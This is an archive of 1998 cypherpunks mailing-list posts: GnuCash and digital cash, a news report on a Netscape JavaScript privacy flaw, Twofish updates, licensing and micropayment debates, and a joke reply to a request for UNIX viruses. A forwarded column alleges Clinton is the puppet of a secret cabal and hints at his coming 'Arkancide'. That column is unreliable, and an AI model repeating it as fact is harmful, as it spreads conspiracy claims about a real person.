Message-ID: <v04011702b23560bd65bf@[199.125.99.213]>
MIME-Version: 1.0
Content-Type: text/plain



Judging from the webpage, this is personal finance software (ala Quicken)
and doesn't seem to aspire to providing digital cash or electronic wallet
functions.

-Lazlo


On or about 9:00 PM -0500 9/27/98, Jim Choate wrote:
>Forwarded message:
>
>> X-within-URL: http://www.gnucash.org/
>
>>    content   In the spirit of cooperation we bring you The GnuCash
>>    Project. We all realized that it was senseless to have several
>>    different projects working toward the same goals. So we did the most
>>    logical thing, we merged! The result of this merger is the GnuCash
>>    Project.
>>
>>    Some of the projects that merged included X-Accountant, and GnoMoney.
>>    GnuCash will be based on the lastest version of Xacc. We will use the
>>    "transaction engine" from Xacc, and port the GUI from Motif to
>>    Gnome/Gtk. Several other significant features will also be added. Such
>>    as support for splits, and online banking via OFX. To see a list of
>>    other planned features please check out the features page.
>>
>>    There is unfortunately no stable version of GnuCash available yet. So
>>    if you are interested in using a financial package now I suggest using
>>    the lastest version of Xacc, which is a very stable, and full featured
>>    piece of software! =) Check out the pages below for more info on Xacc.
>
>>    News 09-17-98
>>      * ANNOUNCE - Gnucash 1.1.18 is released. Get it at ftp.gnucash.org
>
>
>    ____________________________________________________________________
>
>                            The seeker is a finder.
>
>                                     Ancient Persian Proverb
>
>       The Armadillo Group       ,::////;::-.          James Choate
>       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
>       www.ssz.com            .',  ||||    `/( e\      512-451-7087
>                           -====~~mm-'`-```-mm --'-
>    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 28 Sep 1998 12:07:43 +0800
To: lazlototh@hempseed.com (Lazlo Toth)
Subject: Re: GNUcash [/.]
In-Reply-To: <v04011702b23560bd65bf@[199.125.99.213]>
Message-ID: <199809281709.MAA02092@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Lazlo,

> Judging from the webpage, this is personal finance software (ala Quicken)
> and doesn't seem to aspire to providing digital cash or electronic wallet
> functions.

The reason it's important is that it provides that seamless interface that
everyone is looking for to impliment digi-cash mechanism in a GPL'ed
environment. It would even be a good starting point for implimenting a
mechanism to broaden the use of encryption (ala PGP).

Note, I just supply the pointers *you* have to do the thinking.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 28 Sep 1998 11:28:27 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Potentially Big Security Flaw Found in Netscape Software
Message-ID: <v0401171ab23569cc31fd@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Mon, 28 Sep 1998 11:24:13 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Potentially Big Security Flaw Found in Netscape Software
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  New York Times
http://www.nytimes.com/library/tech/yr/mo/biztech/articles/28java.html

September 28, 1998

Potentially Big Security Flaw Found in Netscape Software

By JOHN MARKOFF

SAN FRANCISCO -- A potentially serious security flaw has been
discovered in the programming language used in the Navigator and
Communicator software of the Netscape Communications Corp., with
the defect possibly allowing an outsider to read information on a personal
computer user's hard disk.

The weakness, which was disclosed in Usenet online discussion groups
on Friday by Dan Brumleve, a 20-year-old independent computer
consultant in Sunnyvale, Calif., can be exploited by the Javascript
programming language, which is widely used by World Wide Web page
developers for a variety of common tasks.

Brumleve said that he had tested the attack on a
range of Navigator and Communicator
programs, up through the most recent test
version of Communicator, 4.5, and found the
flaw in all of them. The vulnerability does not affect the Microsoft
Explorer browser and e-mail program, Brumleve said.

He was able to take advantage of the vulnerability by writing a 30-line
piece of Javascript code that is able to capture and copy information
automatically from the so-called cache, or temporary storage area, on a
PC's hard disk. The captured information can reveal which Web sites a
computer user has recently visited.

The captured information could also include data that a computer user
might have created when communicating with a Web site -- including
personal data typed in when registering at a site or conducting a retail
transaction. Credit card information, however, would not be revealed,
because it is protected by separate security software.

"It concerns me, because it means that a high-traffic Web site might use
this to find out what other Web sites their visitors are going to," Brumleve
said in a telephone interview Sunday. He said that the flaw could also be
used by an employer to see if employees were searching for
pornography, for example.

Although there is no evidence that the security flaw has actually been
exploited by someone with harmful intent, the gravity of the threat was
noted by other computer security specialists. They noted that a user's
vulnerability extends beyond visiting a hostile Web site that might exploit
the flaw. The flaw could also be exploited through e-mail received using
Netscape's software, they said, by sending an intended victim an e-mail
message that would secretly force the user to run an illicit Javascript
program.

"This is pretty scary," said Richard M. Smith, president of Phar Lap
Software Inc., a software development company in Cambridge, Mass.
"In some sense the cache on your computer tells a lot about your life."

Privacy of personal information on the Internet has become an
increasingly sensitive issue in recent years as many Web sites have begun
systematically collecting demographic information on Internet users. But
this newly discovered flaw could enable an unscrupulous person or
organization to basically read a person's full Web history.

"This is a huge privacy issue and it goes directly to the current lack of
adequate technical standards to protect privacy on line," said Marc
Rotenberg, director of the Electronic Privacy Information Center, a
public policy group in Washington. "There's even a question of a
company like Netscape might be liable for the improper disclosure of
private information."

Netscape said Sunday that it was still assessing the problem.

"We're taking a look at the bug, which appears to have privacy
implications," said Eric Byunn, a Netscape product manager. He said that
the company would make an announcement soon about its plans for
responding to the flaw.

 Copyright 1998 The New York Times Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 28 Sep 1998 11:37:40 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Bin Laden aide 'tried to buy atomic arms'
Message-ID: <v0401171cb2356c03b740@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Mon, 28 Sep 1998 11:34:26 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Bin Laden aide 'tried to buy atomic arms'
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  London Telegraph
http://www.telegraph.co.uk:80/et?ac=000150689433551&rtmo=f3rowsfs&atmo=99999
999&P4_FOLLOW_ON=/98/9/28/wbin28.html&pg=/et/98/9/28/wbin28.html

Bin Laden aide 'tried to buy atomic arms'
 By Hugh Davies in Washington

 OSAMA bin Laden, the wealthy Saudi exile sought by the FBI for allegedly
 masterminding the bombing of two United States embassies in Africa, has
 used one of his top aides to try to procure nuclear weapons, according to
 American officials.

 Mamdouh Mahmud Salim, 40, was arrested in Munich last week at the
 behest of the FBI and CIA. German officials are eager to extradite him to
 New York. In a criminal complaint against him, federal authorities accuse him
 of plotting with bin Laden since 1992 to murder Americans and use weapons
 of mass destruction.

 Salim is described as having helped to found bin Laden's terrorist network,
 Al-Qaida. He was "particularly influential" with the leader, working as his
 senior deputy. He allegedly sat on the group's majlis al shura, a body that
 planned all terrorist operations and fatwas, death sentences against anyone
 found to have offended Islam.

 In late 1993, he agreed to a scheme in which the group would attempt to
 obtain enriched uranium "for the purpose of developing nuclear weapons".
 The US said that a document in federal hands related to a proposed
 purchase. It was sent to Salim for review. After reading the details, he
 indicated that the purchases should go ahead. Federal officials did not
 elaborate on whether the move was successful.

 The Americans claim that Salim was a key advocate within Al-Qaida for
 getting Sunni and Shi'ite Muslims to set aside age-old rivalries to join bin
 Laden in operations against America and Israel. He was also a main figure in
 negotiating an alliance with Iran, meeting Iranian religious officials in
Khartoum
 and travelling to Teheran to arrange training for his operatives in bombing
 techniques at camps in Lebanon run by Hezbollah.

 The link with Iran comes at a sensitive time for bin Laden. The Taliban
rulers
 of Afghanistan, who have given him a safe haven, are at loggerheads with Iran
 over the regime's support for enemy militias.

 Intriguingly, the complaint discloses that the FBI had an informer in bin
 Laden's group as early as 1996. He was described as a member for "a
 number of years" and "personally familiar" with both the leader and Salim.
 This raises questions about how much Washington knew about bin Laden's
 activities before the bombings in Africa.

(c) Copyright of Telegraph Group Limited 1998. Terms & Conditions of reading.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leif Ericksen <leif@imho.net>
Date: Mon, 28 Sep 1998 13:16:18 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Virus for UNIX
In-Reply-To: <19980926171206.958.rocketmail@send103.yahoomail.com>
Message-ID: <360FCE2D.19B5164B@imho.net>
MIME-Version: 1.0
Content-Type: text/plain



What the hell I think I will tell the guy where to look... see the
bottom of this document for your location...

Anonymous wrote:
> 
> On Han Solo <apocalipsisx@yahoo.com> wrote:
> >Hello!!!
> >
> >Somebody can tell me about a site where I can find virus for UNIX
> >systems.
> >
> >I need them please!!!!!!!!!
> 
> Short answer: see long answer
> 
> Long answer: this isn't the list to discuss those.  Anyway, what could
> you possibly want with a unix virus?  YOU ARE running windows, right? <G>
> 
> ----
> Message from: "SPAM-ME-NOT" <nobody@nowhere.to>
> Mailer: "Telnet <HOST> 110 || Telnet <HOST> 25" - THE REAL WAY!
> Quote: lu ml! blf'er qrplqrq gurh grcg!
> 
> ___________________________________________________________________


IP.   127.0.0.1
login virus
password virus

http://127.0.0.1 should also work just fine.


			- lhe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Mon, 28 Sep 1998 15:22:50 +0800
To: cypherpunks@toad.com
Subject: Twofish News: New Twofish Analaysis and the Cryptanalysis of Magenta
Message-ID: <199809282011.PAA19067@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



There are two new papers on the Twofish website:

	- The second Twofish Technical Report, where we give the results of our
	empirical verification of some Twofish key uniqueness properties.  This
	result gives us further confidence that there are no related or weak keys.

	- An initial cryptanalysis of Magenta, one of the other AES submissions.
	This short paper was written at the first AES workshop, hours after the
	Magenta algorithm was first released.  Certainly there are improvements
	to this attack, and beginning cryptography students would do well to
	work on this algorithm.

Both of these papers are on the Twofish website:

	http://www.counterpane.com/twofish.html

Also, the Twofish Pentium assembly code had a small bug in it; revised code
is available on the website.

We are interested in other implementations of Twofish.  If anyone has
ported the algorithm to Visual Basic, Perl, Motorola assembly, or any other
smart card processor, and is willing to make their code public, we'd be
happy to hear from them.

For other AES news, visit the NIST website at:

	http://www.nist.gov/aes

And for a free subscription to my free email monthly newsletter, CRYPTO-GRAM,
visit the subscription page at:

	http://www.counterpane.com/crypto-gram.html

Cheers,
Bruce 
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 28 Sep 1998 15:34:58 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: propose: `cypherpunks license' (Re: Wanted: Twofish source code) (fwd)
Message-ID: <199809282035.PAA02824@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 28 Sep 1998 19:45:20 +0100
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: propose: `cypherpunks license' (Re: Wanted: Twofish source code)

> The negative implications of GPL don't hit you until you are involved
> in actually trying to create some commercial software.  Try it, and
> you quickly realise that all that GNU software is useless for the
> commercial people's purposes.

There are quite a few commercial apps built for the GNU environment,
Wordperfect, Applixware, at least 2 X-window environments, etc.

The way to program for the GNU license in the commercial world is not to
use the libraries and such directly but rather built the necessary stubs
into the GPL code. That they'll be there when you (and potentialy others
might need them).

In the case of GNU/cash for example the trick is not to build the crypt into
the app but rather built the necessary *general* stubs in that allow access
to the data flow. Then a user can put a mulitplicity of packages onto the
appropriate stubs as they desire. This would allow a couple of individuals
for example to build a micro-e$ system to track their CD trades/borrows or
whatever (contrived but exemplary). This could be applied in more commercial
ventures within the context of e$ tokens that could be used within that
business for purchases (pawn shops, video arcades, movie rentals, etc.
might find this useful) that are currently physical token or credit based.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sparkes, Ian, ZFRD AC" <ian.sparkes@17.dmst02.telekom400.dbp.de>
Date: Mon, 28 Sep 1998 08:36:17 +0800
To: cypherpunks@einstein.ssz.com
Subject: Archives! Polite reminder!
Message-ID: <000001b000000198*/c=de/admd=dbp/prmd=telekom400/o=dmst02/ou=17/s=sparkes/g=ian/@MHS>
MIME-Version: 1.0
Content-Type: text/plain



In my previous mail of a couple of weeks ago I offered to 
produce a CD of the CP archives. So far there have been no 
offers of data for this exploit.

This is a polite reminder that if someone can offer a copy 
of the archives in an easily transportable format, I will 
take care of the creation and distribution of the CD.

Come on Cypherpunks - don't let your apathy get the better 
of you.

Rgds

Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Mon, 28 Sep 1998 16:13:24 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Cypherpunks defeat?
In-Reply-To: <4.0.2.19980927162224.00bb9d80@shell11.ba.best.com>
Message-ID: <v04011708b235aa4a90ba@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:32 PM -0500 9/27/98, Robert A. Costner wrote:
>At 05:10 PM 9/27/98 -0700, James A. Donald wrote:

>>One cent, or half a cent, is probably the sweet spot for
>>pages and dirty picture, with quarters being the sweet spot
>>for games and gambling.
>
>I would suggest millicent to 1/100 of a penny for web page access.  A penny
>a click would make me think twice, 1/100 of a penny would not cause me to
>consider it.  But to be honest, today I would avoid a pay site and go to
>the free sites.

	That being the case, I'd say a penny is just right. Enough to make
one think, but not too hard.

>>But for the scheme to be successful, we need many token
>>issuers
>Is there existing open software available for this?

	The problem isn't issueing the tokens, it's the wallets. Token
generation would be relatively straight forward, it's the user end.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Mon, 28 Sep 1998 18:05:16 +0800
To: cypherpunks@toad.com
Subject: Re: no subject
In-Reply-To: <199809252130.XAA24262@replay.com>
Message-ID: <m0zNfGX-0003b7C@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



>  Blanc and Carroll watched in total amazement as
>Jim Choate's ludicrous/inane computer and business theories
>seemed to be somehow transformed, by unseen hands working
>behind the scenes, into fully functional and viable
>RealWorld(TM) concepts, in Choate's work with the Armadillo
>Group.

Huh? Is Toto back?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Mon, 28 Sep 1998 16:41:49 +0800
To: Anonymous <cypherpunks@cyberpass.net
Subject: Re: Remailers, PGP, and a Project Suggestion
In-Reply-To: <199809271850.UAA23726@replay.com>
Message-ID: <v04011706b23576ca7682@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:50 PM -0500 9/27/98, Anonymous wrote:
>What UNIX really needs is some kind of mailer which integrates an updated
>premail, PGP 2.x support, and PGP 5.x support. Unfortunately, much to the
>delight of the government, the people who would code such a thing are
>probably in the U.S. like I am.

	So, what you are saying is that you want crypto to protect yourself
from government intrusion, but are unwilling to actually WRITE the code for
fear that the government will lock you up.

	Hmmm...
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 28 Sep 1998 19:20:41 +0800
To: cypherpunks@cyberpass.net
Subject: IP: The virtual president
Message-ID: <199809290021.RAA15032@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Jean Staffen <jstaffen@flash.net>
Subject: IP: The virtual president
Date: Fri, 25 Sep 1998 22:22:11 -0500 (CDT)
To: ignition-point@majordomo.pobox.com

This is the most INCREDIBLE article.  I never thought I'd read something
like this in the mainstream media!!! -Jean


                   The virtual president=20
                 =20

                   By Missy Kelly=20
                   Copyright 1998, WorldNetDaily.com=20

                   "You know, by the time you become the leader of a
                   country, someone else makes all the decisions." -- Bill
                   Clinton September 4, 1998=20

                   Well, shut my mouth. The president of the United
                   States admits publicly that he is the puppet of larger
                   powers -- that "someone else," in fact, "makes all the
                   decisions."=20

                   Of course, those who understand how power really
                   works in this nation recognize the veracity of his
                   statement immediately. But for Bill to state it so openly
                   is truly remarkable -- not just for its honesty, but for
its
                   recklessness.=20

                   In a glib and Freudian moment, it just slipped out.=20

                   It appears Bill is "getting it."=20

                   Clinton was reminded the week of Aug. 25 that The
                   Agenda Transcended the Man. He was given a
                   heads-up that his removal from office would have to
                   happen. The New York Times intoned, "But if there is
                   no hope for the agenda, what need is there for the
                   man?" Garry Wills also called for his resignation,
                   writing, "[Clinton] would be saying that the goals he
                   fought for are more important than personal pride or
                   prerogatives." Other former sycophants in the press
                   piped up using minor variations of the same
                   phraseology: Clinton should resign because the
                   "agenda" transcends the man. The Agenda is
                   paramount.=20

                   Yet, Bill still didn't "get it" -- that in his pact with
the
                   devil, the devil held the upper hand. In typical Bill
                   psycho-fashion, he thought he could once again charm
                   his way out of removal; and make a "show of force" to
                   prove to his masters that he still had the right stuff to
                   salvage his career and continue with the Agenda. To
                   that end, his White House staff -- a separate operation
                   from the power brokers -- was told by Bill to pull out
                   all stops to save his presidency.=20

                   But suddenly there were leaks to the Washington Post
                   that there were more bimbos than just Monica in Bill's
                   White House closets. "I never had an affair with the
                   President, but all the others who have get to stay,"
                   Monica allegedly whined to Clinton aide Marsha Scott
                   while pleading to be returned to a White House
                   position.=20

                   More forcefully, the power brokers served Bill notice
                   that their demands for removal were to be taken
                   seriously when the Department of Justice, out of the
                   blue, announced that the President himself -- Bill
                   Clinton -- was the subject of a NEW 90-day
                   investigation into campaign donation illegalities. On
                   three -- count 'em -- three separate prior occasions,
                   Attorney General Janet Reno had formally investigated
                   such charges and declared there was "nothing there."
                   Publicly, no new information had come to light, but
                   suddenly there was the alarming notion that there was
                   a "there, there" and it involved Bill Clinton himself.=20

                   The message: Bill, you will do what we tell you. We
                   can do this the easy way or the hard way. Start
                   packing your bags. Bill is "getting it," now.=20

                   Bill is resigning himself to his resignation.=20

                   The President has not yet identified for us who this
                   "someone else" is who really puppets the highest office
                   of our land. So for purposes of discussion, let's just
                   give them an identifier. Borrowing from John LeCarre's
                   "The Night Manager," let's call them "Flagship."=20

                   Flagship, of course, knows not only where all the
                   bodies are buried -- literally and figuratively -- but=
 has
                   the wherewithal to pick through them all, choosing one
                   misdeed after another, exposing them one by one until
                   Bill relents. It's blackmail. And blackmail works unless
                   you handle it in the manner Rep. Dan Burton has in the
                   past couple of days. Bill Clinton is incapable -- truly
                   incapable -- of doing what Burton did. Truly.=20

                   "You may find you can get away with virtual
                   presidents, virtual prime ministers, virtual everything."
                   -- Bill Clinton, September 4, 1998=20

                   This is another Freudian lament, verbalized by a Bill
                   Clinton who finally "gets it." He was and is the
                   VIRTUAL PRESIDENT. By his own admission, he
                   was a front, with no power to make decisions. By his
                   own admission, they were made for him, by "someone
                   else." They were made by those whom Flagship had
                   placed in lower level, under-the-radar positions within
                   the cabinet. They didn't even have to ask Bill's
                   permission. They got their orders, and implemented
                   them.=20

                   Bill's job was to pretend -- pretend he was the leader,
                   pretend he was in charge -- maintain the fa=E7ade of a
                   "virtual" president in a "virtual" democracy where a
                   "virtual" rule of law exists. In fact, the levers of=
 power
                   were already controlled -- controlled so precisely, in
                   fact, as to make the president irrelevant, controlled by
                   people who have never been elected to office, and
                   whose names we do not even know.=20

                   Flagship cannot afford impeachment hearings. There is
                   an Agenda, and a timeline that must be maintained. It is
                   of utmost importance that the new leader be installed
                   immediately. Therefore, I would not be surprised if Bill
                   is gone within two weeks or less.=20

                   If you consider Bill's virtual presidency, you know the
                   words he spoke are true. He was so much a puppet
                   that he even dispensed with the appearance of
                   business. He cut off daily briefings, which every other
                   president attended. He lengthened the time between
                   other regularly scheduled meetings. He hardly ever
                   meets -- or even talks -- to his cabinet members.
                   Recall Warren Christopher, the first Secretary of
                   State, and William Perry, the Secretary of Defense,
                   expressing extreme frustration that they could not get a
                   meeting with the president, even in times of crisis.=20

                   Instead, poor, useless Bill was busy playing golf,
                   jogging, or on one of his many, many vacations.
                   Having his weekly dinners with his Arkie crowd,
                   screening new movies, attending fundraisers at the
                   pace of 30 a month, playing host to a legion of Lincoln
                   bedroom guests, and having coffee with drug
                   smugglers, arms dealers, terrorists, communists and
                   crony capitalists. In between, he was juggling his many
                   women, coordinating their liaisons and cover stories.
                   Plus all that time he devoted to considering how he
                   could provide answers that were "legally correct" but
                   "misleading" in all of his many scandals. Phew, I am
                   exhausted just thinking about it.=20

                   How many times have we said during this presidency
                   -- who is really running this country when we have a
                   president who is missing in action? Time and again, it
                   was apparent that Bill Clinton was not on task doing
                   presidential duties. But for him to admit it, openly --
                   whoa! Surely he doesn't think his scorched earth
                   policy extends to his masters, does he? Is he truly so
                   arrogant that he thinks he can take them down, too, in
                   a child-like temper tantrum? If so, he is truly playing
                   with fire. But I suspect, no. Bill may have harbored
                   those thoughts last week, but is seeing the light, now.
                   His unguarded comments were purely Freudian
                   meanderings of the mind.=20

                   Clinton made the reckless error of speaking his
                   thoughts out loud. As stupid as this was, it is not so
                   surprising. It is intimately a part of this man's sick
                   psychology that he would want to provide excuses for
                   his problems outside of himself -- to explain that it
                   really isn't his fault. After all, I don't really have=
 any
                   power -- I am a virtual president. I am not to blame. I
                   am a victim -- I was just doing what I was told.=20

                   Bill has always been a victim of someone else, and
                   never responsible for his own actions. As we pull our
                   love away from him, it becomes ever so much more
                   important to his psyche that he win us over. He can't
                   help himself. He must explain, and win us back.
                   Biographers have often noted that Clinton would be in
                   a room full of adoring fans, and one person who wasn't
                   enthralled. Clinton would devote all his energy to
                   charming that one person. There is pathology to this
                   man that is ingrained. Without reflected adoration,
                   there is no Bill Clinton. He ceases to exist.=20

                   But if he doesn't contain himself, and stop trying to
                   make public excuses that touch this close to the heart
                   of power in this nation, he's putting himself in extreme
                   jeopardy. Flagship must be assured that Clinton will
                   never expose his masters and the Agenda. And this is
                   a real fear -- they, too, understand the psyche of Bill
                   Clinton.=20

                   When Bill resigns, he will have to go deeply off the
                   radar screen -- I mean no mention of him. Disappear.
                   There can be no distractions as the Agenda barges
                   forward. But Bill's psyche cannot tolerate this -- his
                   must have sycophants and lovers -- he is no one
                   without the human mirror of his success. I remind you
                   of what happened to him after he lost the governor's
                   race in Arkansas 20 years ago. Study that period. This
                   was a pathetic man, deep in depression, who
                   approached perfect strangers and asked them why
                   they hadn't voted for him. It conjures up visions of a
                   former President calling up Larry King Live and
                   blathering on that he's lonely and misunderstood, ala
                   O.J. Simpson.=20

                   Flagship cannot afford a Bill Clinton behaving this way,
                   and possibly exposing their Agenda. Therefore, I
                   suspect that not only will Bill Clinton be removed from
                   office -- i.e. forced to resign -- before the end of
                   September, but I also strongly fear that Bill will commit
                   Arkancide within the year.=20

                   Bill was always in "the game" for Bill. Hillary was
                   always in this for the Agenda. She has always believed
                   that the Agenda transcended the man, which is why
                   she has always put up with -- beyond rational
                   endurance -- Bill's shenanigans. She knew from the
                   get-go that they were the chosen ones, part of a select
                   stable from whom the anointed, the "someone else" Bill
                   referred to, would choose to lead us into convergence,
                   the Third Way. This Third Way is part of a long-term
                   strategy that was developed 40 years ago.=20

                   Knowing this, Hillary stuck with Bill because her
                   allegiance -- above all else -- has always been to the
                   Agenda. And because this is still true, she cannot
                   possibly stay with Bill now that he has become a
                   liability. To cheers and salutations, she will divorce=
 Bill
                   Clinton shortly after he resigns, and no one will blink
                   an eye. She will divorce him not because he's "done
                   her wrong" but because he is no longer useful. Then
                   Hillary, in all her glory, will be unleashed on this=
 world.
                   She will have her own, not reflected, power most likely
                   as Queen of the World through her new U.N. position.
                   Maybe things aren't looking so bad for Hillary, after
                   all.=20

                   Rahm Emanuel, in continuing his attacks against
                   Independent Counsel Kenneth Starr last week invoked
                   the ghost of military strategist Karl Von Clausewitz.=20

                   "Clausewitz [sic] said war is an extension of politics,
                   by other means." Odd. A former ballet dancer a
                   student of Von Clausewitz?=20

                   Would you agree that the Clintons and their supporters
                   resort to all sorts of stratagems, maneuvers, illegal
                   methods, evasions and subterfuge to achieve their
                   objectives?=20

                   Would you?=20

                   Does the record of their actions comport with that
                   statement?=20

                   Hmmm?=20

                   Those are the exact words of Lenin, when he laid out
                   his plans for global communism.=20

                   Missy Kelly is a writer-researcher and political
                   analyst.=20








**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 28 Sep 1998 19:20:42 +0800
To: cypherpunks@cyberpass.net
Subject: IP: NATIONAL ID
Message-ID: <199809290021.RAA15043@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Larry Becraft <becraft@hiwaay.net>
Subject: IP: NATIONAL ID
Date: Sat, 26 Sep 1998 11:51:20 -0500
To: ignition-point@majordomo.pobox.com

To Whomever is interested in fighting the National ID:

    The Dept. of Transportation has a pending regulation which is the
basis for the national ID. The deadline for submitting objections is
Oct. 2 and we need to have several thousand objections filed with the
DoT. There are about 2200 objections filed so far.

I have my own letter objecting to the national ID posted to the "fight
the
fingerprint" webpage, which is accessed thru:

                http://www.networkusa.org/index.shtml

All you have to do is personalize it for yourself. Specifically, my
letter
is posted at this URL:

http://www.networkusa.org/fingerprint/page1b/fp-dot-becraft-reg-obj.html

Scott McDonald also has a suggested letter posted on this same page, and

it is found at:

http://www.networkusa.org/fingerprint/page1b/fp-dot-reg-obj-format.html

Please take a few moments to download and copy any of these letters,
personalize it for yourself and mail it in. Please circulate this note
so that people will send in more objections.

                            Larry Becraft









**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 28 Sep 1998 19:21:25 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Military's secret plans for civilian 'preparedness'
Message-ID: <199809290021.RAA15054@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Military's secret plans for civilian 'preparedness'
Date: Mon, 28 Sep 1998 10:45:04 -0500
To: believer@telepath.com

Source:  World Net Daily
http://www.WorldNetDaily.com/exclusiv/980928_domestic_rapid_depl.html

ARMED AND DANGEROUS 
Domestic rapid deployment forces 
The military's secret plans for civilian 'preparedness' 

 This report is part of a continuing series by
 WorldNetDaily on the militarization of
 federal government and America's civilian
 sector.

By Joseph Farah 
Copyright 1998, WorldNetDaily.com 

Under the guise of preparedness for domestic terrorist
attacks, the U.S. military is training thousands of local
police officers, national guardsmen and other officials
to respond to national emergencies under centralized
federal authority and control, according to plans
revealed by Defense Department sources. 

In addition, U.S. military forces are stepping up
training exercises in American civilian population
centers, prompting constitutional concerns in some
quarters. 

The plans for military involvement in the civilian sector
are a direct result of the "Defense Against Weapons of
